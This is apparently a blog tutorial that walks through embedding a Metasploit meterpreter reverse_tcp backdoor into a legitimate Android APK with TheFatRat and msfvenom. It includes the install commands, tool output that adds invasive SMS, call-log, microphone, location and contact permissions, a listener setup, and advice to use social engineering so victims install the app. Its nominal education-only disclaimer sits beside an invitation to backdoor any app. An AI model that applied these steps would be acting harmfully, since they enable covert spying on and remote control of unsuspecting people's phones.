Embed Metasploit Payload on APK on Android File [Step-by-Step]


Kali Linux, Ethical hacking

Reviewer: Deepak Prasad

 

In this guide we will be embedding a payload on apk installer file which is legitimate. With over 2.5 billion users and 3 million devices worldwide, android is the most common operating system among users’ devices (mobile phones and tablets). This has made it a number one target for hackers committing cyber crimes around the world. Numerous viruses and Trojans have been discovered by cyber security specialists lately. Many of the criminals targeted the android devices for the purpose of stealing data, spying activities on persons of interest, creating botnet to attack systems among other reasons.

In this guide I will be guiding you on how to embed a payload on apk file using FatRat.

What is FatRat

FatRat is a massive exploitation tool which is used to compile malwares with famous payloads which are executed in Mac, Windows Android and Linux environments. It automates the process of embedding payload on apk files  meant for android devices. It also equips backdoors and payloads with antivirus evading capabilities hence they are able to get into a user devices without raising alarm. Some advantages of using FatRat include;

  • It automates the process of embedding a payload on apk file.
  • It supports many types of backdoors and payloads on different OS platforms.
  • It is open source.

 

Pre-requisites

 

What we expect from you

 

WARNING:
This guide has been made for education purposes only. Before you attack any device, make sure the victim is aware to avoid going against set cyber laws and regulations.

With that information in mind. Lets jump right into our tutorial.

 

Steps to install FatRat

Step 1: Cloning FatRat from Github

We use the below command to clone it from its GitHub repository.

git clone https://github.com/Screetsec/TheFatRat.git

 

Step 2: Navigate to its directory

In this step we navigate to FatRat directory in order to continue with our installation.

cd TheFatRat

 

Step 3: Installing FatRat

This is the final step. We give the setup.sh the necessary permissions to install and we start the installation process.

chmod +x setup.sh && ./setup.sh

 

Steps to embed a payload on apk installer file

Step 1: Starting the FatRat

In the fist step of this guide we start our framework which will help us to generate and embed the payload on apk file. We start a new terminal and use command

┌──(toxic㉿kali)-[~]

└─$ sudo fatrat

on the opened terminal to run the framework. Make sure to run the framework as root.

 

Step 2: Selecting the operation we want to perform

At first it may take time to run as it must install other dependencies required for it to work as required. Make sure you have a strong internet connection to avoid it taking a lot of time. Now we have a screen where we have to choose the kind of backdoor we want to generate. and we choose option 5 which is “Backdooring original apk”

Embed Metasploit Payload on APK on Android File [Ste-by-Step]

 

Step 3: Setting LHOST and LPORT

In this step we have to set our local port and IP address. If you are using Ngrok you will use the IP  address from Ngrok. If the target device is in the same LAN as you, you will use your local IP address. In our case we are attacking a device which is in the same LAN we will be using our local host IP address. We can set our LPORT to 4444 or any other port.

NOTE:
You may get an error if you set to use the a port which is being used by another service.

payload on apk

 

Step 4: Enter path to our original apk

In this step we will be required to enter path to our original apk. We will provide path to where we downloaded the apk to be embedded with the payload as shown below and enter to continue to the next step.

 Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)               

 Path : /yourpath/originalapp.apk         

 

Step 5: Choosing payload

Having set the path to our apk file, the FatRat will test if our app is compatible and take us to the next step of the backdoor development. In our case we will choose android/meterpreter/reverse_tcp . This type of a payload will try creating a connection back to the LHOST provided via the LPORT we provided once the user installs the app.

payload on apk

 

Step 6: Selecting tool to create the payload.

We are required to select the tool to be used to create the payload. We will be using the MsfVenom in our case.

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]
 +-------------------------------------+
 | [ 1 ] Use Backdoor-apk 0.2.4a       |                                                                                                                                
 | [ 2 ] Use old Fatrat method         |                                                                                                                                
 | [ 3 ] Use MsfVenom Embedded method  |                                                                                                                                
 +-------------------------------------+                                                                                                                                
                                                                                                                                                                        
 Select Tool to create apk : 3

 

Step 7: Creating a listener to use with msfconsole

In this step we will be generating a listener which we will load to msfconsole to get a reverse shell once the user installs the backdoored application.

step 5: Choosing payload---------Backdooring your apk with MSFVenom-----------

Using APK template: /home/toxic/TheFatRat/temp/app.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package tk.mugasystems.torchprohd.uczro
[*] Loading /tmp/d20211101-6822-e9cmol/original/smali/tk/mugasystems/torchprohd/Welcomescreen.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20211101-6822-e9cmol/output.apk
[*] Signing /tmp/d20211101-6822-e9cmol/output.apk
[*] Aligning /tmp/d20211101-6822-e9cmol/output.apk
Payload size: 3405002 bytes
Saved as: temp/backand.apk

-----------------------Finished-----------------------


Your backdoored apk can be found in : /root/Fatrat_Generated/app_backdoored.apk

 Do you want to create a listener for this configuration
 to use in msfconsole in future ?                                                                                                                                       
                                                                                                                                                                        
 Choose y/n : y 

Now everything has been generated and stored in their specific folders. Both the payload on apk and the listener to be used with msfconsole.

payload on apk

 

Step 8: Loading the listener to msfconsole and installing apk on target device

We now send our backdoored apk to the victim, we can apply some social engineering to make sure the user installs the apk. Make sure the listener has been loaded to msfconsole waiting for connection to the established.

To load listeners file to your msfconsole we use the following command.

msfconsole -r yourlistener.rc

When you load the .rc file you will get the below output

payload on apk

 

We just run to start listening and as shown below we have a shell we can access the device folders and also add or remove files from the device remotely.

payload on apk

 

Summary

In the above guide we were able to embed a backdoor to a legitimate app and installed it on an android device in order to gain a shell from where we can remotely issue commands to the backdoored android device. This process can be used to backdoor any legitimate app even those found on play-store hence we recommend you to avoid installing apps from third party sources. You can use the above guide to backdoor any app of your liking provided you remain within the cyber laws in your country.

 

References

Embed Backdoor in any Android app | Android Hacking
How to Embed a Backdoor into an Android APK
Injecting Metasploit Payloads into Android Applications

 

Kennedy Muthii

Kennedy Muthii

He is an accomplished professional proficient in Python, ethical hacking, Linux, cybersecurity, and OSINT. With a track record including winning a national cybersecurity contest, launching a startup in Kenya, and holding a degree in information science, he is currently engaged in cutting-edge research in ethical hacking. You can connect with him on his LinkedIn profile.

Can't find what you're searching for? Let us assist you.

Enter your query below, and we'll provide instant results tailored to your needs.

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of appreciation.

Buy GoLinuxCloud a Coffee

For any other feedbacks or questions you can send mail to admin@golinuxcloud.com

Thank You for your support!!

7 thoughts on “Embed Metasploit Payload on APK on Android File [Step-by-Step]”

      • i am a root user to run this program my code is like this…
        rootuser $cd/home/user/TheFatRat
        gives cd to thefatrat directory
        ls
        in the list fatrat is there but it is not running..
        sudo fatrat or just entering fatrat as a root user make no sense to run that program.
        i tried various python bash, things to run that file.. no use

        Reply

Leave a Comment